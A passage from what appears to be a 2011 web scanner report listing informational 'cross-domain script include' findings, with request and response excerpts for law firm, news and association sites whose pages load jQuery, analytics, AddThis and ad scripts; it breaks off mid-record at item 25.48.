<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d23b78f23506219"></script>
...[SNIP]...
<!-- ####PAGE#### /showlandingpage.aspx?show=6862 -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
25.34. http://www.howardrice.com/Alumni  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /Alumni

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Alumni HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.3.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32212
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:13:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<link rel="Stylesheet" type="text/css" media="print" href="print.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" type="text/javascript" language="javascript"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d23b78f23506219"></script>
...[SNIP]...
<!-- ####PAGE#### /showlandingpage.aspx?show=6863 -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
25.35. http://www.howardrice.com/Events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /Events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Events HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.1.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114611
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:12:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<link rel="Stylesheet" type="text/css" media="print" href="print.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" type="text/javascript" language="javascript"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d23b78f23506219"></script>
...[SNIP]...
<!-- ####PAGE#### /showlandingpage.aspx?show=6095 -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
25.36. http://www.letipli.com/member_details.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /member_details.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /member_details.asp HTTP/1.1
Host: www.letipli.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:02:20 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Connection: close
Content-Length: 7058
Content-Type: text/html
Expires: Wed, 11 May 2011 17:02:20 GMT
Set-Cookie: ASPSESSIONIDAASSBRSR=CBAOPBMBBIDOFIDJGBAJAHPK; path=/
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="keywords" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4dbde2bc459fdfb2"></script>
...[SNIP]...
25.37. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</script>

<script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
...[SNIP]...
<div id="ad_DockingbarExpandable" class="advertisement ">
       
       
               <script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;u=%5e%5e;sz=230x25;tile=1;ord=1786119601?" type="text/javascript"></script>
...[SNIP]...
<!-- START: RSI Code -->
       <script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07608"></script>
...[SNIP]...
25.38. http://www.memberize.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.memberize.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.memberize.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522804;expires=Sat, 04-May-2041 18:09:30 GMT;path=/
Set-Cookie: CFTOKEN=19f53deac5c145f8-E56630CB-D256-0A97-CE74511543FB5F25;expires=Sat, 04-May-2041 18:09:30 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522804%26CFTOKEN%23%3D19f53deac5c145f8%2DE56630CB%2DD256%2D0A97%2DCE74511543FB5F25%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A30%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A30%27%7D%23hitcount%3D2%23cftoken%3D19f53deac5c145f8%2DE56630CB%2DD256%2D0A97%2DCE74511543FB5F25%23cfid%3D26522804%23;expires=Sat, 04-May-2041 18:09:30 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
</table>


   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
25.39. http://www.njbiz.com/article.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.njbiz.com
Path:   /article.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /article.asp HTTP/1.1
Host: www.njbiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Length: 23058
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 12 May 2011 11:25:51 GMT
Last-Modified: Thu, 12 May 2011 16:55:51 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSPERMUSERID=273426946551164; path=/; expires=Fri, 11 May 2012 12:55:51 GMT
Set-Cookie: PBCSSESSIONID=273426946551164; path=/
Set-Cookie: PBCSSESSIONID=273426946551164; path=/
X-Passed-To: S260608AT1VW727, URL Rewrite on site N/A (2011-05-12 12:55:51:118)
X-Handled-By: S260608AT1VW727, Rewrite on site N/A
X-Actual-URL: S260608AT1VW727, (/apps/pbcs.dll/article?AID=/.asp)
X-Passed-To-DLL: S260608AT1VW727, (2011-05-12 12:55:51:118)
X-Passed-To-BeforeDispatch: S260608AT1VW727, on site NJ (2011-05-12 12:55:51:118)
X-Returned-From-BeforeDispatch: S260608AT1VW727, on site NJ (2011-05-12 12:55:51:868)
X-Passed-To-PostProcessResponse: S260608AT1VW727, on site NJ (2011-05-12 12:55:52:008)
X-Returned-From-PostProcessResponse: S260608AT1VW727, on site NJ (2011-05-12 12:55:52:008)
X-Returned-From-DLL: S260608AT1VW727 (2011-05-12 12:55:52:008)
X-Returned-From: S260608AT1VW727(2011-05-12 12:55:52:008)
Date: Thu, 12 May 2011 16:55:51 GMT
X-Cache: MISS from sxsquid04
X-Cache-Lookup: MISS from sxsquid04:80
Via: 1.0 sxsquid04 (squid/3.0.STABLE18)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
...[SNIP]...
<link href="/css/ui/ui.all.css" rel="stylesheet" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
25.40. http://www.nldhlaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nldhlaw.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.nldhlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Nelson+Levine+deLuca+%26+Horst&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 31346
Content-Type: text/html
Expires: Thu, 12 May 2011 14:29:07 GMT
Set-Cookie: ASPSESSIONIDAACCTASC=KOPDCFPBADJKBGLOBNJKLPMP; path=/
Cache-control: private
Set-Cookie: BIGipServerFIRMSND07-80=272686346.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>National Insurance Attorneys | Coverage &amp; Litigation Lawyers, Phila
...[SNIP]...
<link href="/Includes/Templates/Active/handheld.css" rel="stylesheet" type="text/css" media="handheld">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
25.41. http://www.nldhlaw.com/PracticeAreas/Employment-Law.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nldhlaw.com
Path:   /PracticeAreas/Employment-Law.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PracticeAreas/Employment-Law.asp HTTP/1.1
Host: www.nldhlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/PracticeAreas/Institutional-Litigation-and-Consulting.asp
Cookie: ASPSESSIONIDASCAQAQD=FPPKOIPBNEPEKIPAKHLPOKPB; BIGipServerFIRMSND07-80=272948490.20480.0000; CP=null*; s_sess=%20flid%3D1305216553783%3B%20c_m%3Dnelson%252Blevine%252Bdeluca%252B%2526%252Bhorstwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dnelson%252Blevine%252Bdeluca%252B%2526%252Bhorst%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.nldhlaw.com%253Apracticeareas%253Ainstitutional-litigation-and-consulting.asp%255E%255EEmployment%2520Law%255E%255Ewww.nldhlaw.com%253Apracticeareas%253Ainstitutional-litigation-and-consulting.asp%2520%257C%2520Employment%2520Law%255E%255E%3B%20s_sq%3Dfindlaw-16733%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.nldhlaw.com%2525253Apracticeareas%2525253Ainstitutional-litigation-and-consulting.asp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.nldhlaw.com%2525252FPracticeAreas%2525252FEmployment-Law.asp%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216553787'%255D%255D%7C1463069353787%3B%20s_nr%3D1305216553790%7C1307808553790%3B%20s_vnum%3D1307808553788%2526vn%253D2%7C1307808553788%3B%20ch_directload%3D1%7C1305221247351%3B%20s_invisit%3Dtrue%7C1305221247352%3B%20omtr_lv%3D1305219447353%7C1399827447353%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305221247353%3B; randomizeImagei-context-=5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:57:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 30335
Content-Type: text/html
Expires: Thu, 12 May 2011 15:17:28 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Employment Law | Multi-District Litigation Lawyers, Philadelphia PA, Co
...[SNIP]...
<link href="/Includes/Templates/Active/handheld.css" rel="stylesheet" type="text/css" media="handheld">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
25.42. http://www.nldhlaw.com/PracticeAreas/Institutional-Litigation-and-Consulting.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nldhlaw.com
Path:   /PracticeAreas/Institutional-Litigation-and-Consulting.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PracticeAreas/Institutional-Litigation-and-Consulting.asp HTTP/1.1
Host: www.nldhlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/
Cookie: ASPSESSIONIDASCAQAQD=FPPKOIPBNEPEKIPAKHLPOKPB; BIGipServerFIRMSND07-80=272948490.20480.0000; CP=null*; s_sess=%20flid%3D1305216553783%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.nldhlaw.com%253Ahome%2520page%255E%255Ehttp%253A%252F%252Fwww.nldhlaw.com%252FIncludes%252FTemplates%252FActive%252Fimages%252Fn-prac-inst-o.png%255E%255Ewww.nldhlaw.com%253Ahome%2520page%2520%257C%2520http%253A%252F%252Fwww.nldhlaw.com%252FIncludes%252FTemplates%252FActive%252Fimages%252Fn-prac-inst-o.png%255E%255E%3B%20c_m%3Dnelson%252Blevine%252Bdeluca%252B%2526%252Bhorstwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dnelson%252Blevine%252Bdeluca%252B%2526%252Bhorst%3B%20s_sq%3Dfindlaw-16733%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.nldhlaw.com%2525253Ahome%25252520page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.nldhlaw.com%2525252FPracticeAreas%2525252FInstitutional-Litigation-and-Consulting.asp%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216553787'%255D%255D%7C1463069353787%3B%20s_nr%3D1305216553790%7C1307808553790%3B%20ch_directload%3D1%7C1305220703663%3B%20s_vnum%3D1307808553788%2526vn%253D2%7C1307808553788%3B%20s_invisit%3Dtrue%7C1305220703666%3B%20omtr_lv%3D1305218903667%7C1399826903667%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220703667%3B; randomizeImagei-context-=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:48:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 42920
Content-Type: text/html
Expires: Thu, 12 May 2011 15:08:24 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Law Firm Nelson Levine de Luca &amp; Horst Attorneys Blue Bell, Pennsyl
...[SNIP]...
<link href="/Includes/Templates/Active/handheld.css" rel="stylesheet" type="text/css" media="handheld">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
25.43. http://www.nytimes.com/2007/02/09/business/09legal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2007/02/09/business/09legal.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2007/02/09/business/09legal.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:56:02 GMT
Set-cookie: RMID=8a5a625a144d4dcc11228918; expires=Friday, 11-May-2012 16:56:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*2635d=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 61572


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nytimes.com/js/c
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="Javascript" type="text/javascript" id="ew1486340_wrapper"
src="http://cdn.eyewonder.com/100125/769983/1486340/wrapper.js"></script>
...[SNIP]...
<div id="insideNYTimes" class="doubleRule">
<script type="text/javascript" src="http://js.nyt.com/js/app/moth/moth.js"></script>
...[SNIP]...
25.44. http://www.nytimes.com/2009/01/13/business/13bail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/01/13/business/13bail.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2009/01/13/business/13bail.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:59 GMT
Set-cookie: RMID=d8ee86371f324dcc111f8854; expires=Friday, 11-May-2012 16:55:59 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*2635d=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 68967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.ny
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="Javascript" type="text/javascript" id="ew1486340_wrapper"
src="http://cdn.eyewonder.com/100125/769983/1486340/wrapper.js"></script>
...[SNIP]...
<div id="insideNYTimes" class="doubleRule">
<script type="text/javascript" src="http://js.nyt.com/js/app/moth/moth.js"></script>
...[SNIP]...
25.45. http://www.nytimes.com/2009/06/19/business/19scrushy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/06/19/business/19scrushy.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2009/06/19/business/19scrushy.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:58 GMT
Set-cookie: RMID=8a5a625a144d4dcc111e8902; expires=Friday, 11-May-2012 16:55:58 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*192f3=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 65875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nyt
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="Javascript" type="text/javascript" id="ew1486340_wrapper"
src="http://cdn.eyewonder.com/100125/769983/1486340/wrapper.js"></script>
...[SNIP]...
<div id="insideNYTimes" class="doubleRule">
<script type="text/javascript" src="http://js.nyt.com/js/app/moth/moth.js"></script>
...[SNIP]...
25.46. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2010/08/22/sports/cycling/22armstrong.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2010/08/22/sports/cycling/22armstrong.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:57 GMT
Set-cookie: RMID=fa2f606568f14dcc111a74bd; expires=Friday, 11-May-2012 16:55:54 GMT; path=/; domain=.nytimes.com
Content-type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="insideNYTimes" class="doubleRule">
<script type="text/javascript" src="http://js.nyt.com/js/app/moth/moth.js"></script>
...[SNIP]...
25.47. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ober.com
Path:   /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d39f7953ddc4baa"></script>
...[SNIP]...
25.48. http://www.orangecountyala.org/clubportal/memlogin.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/memlogin.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /clubportal/memlogin.cfm?clubID=809 HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orangecountyala.org/clubportal/ocala/
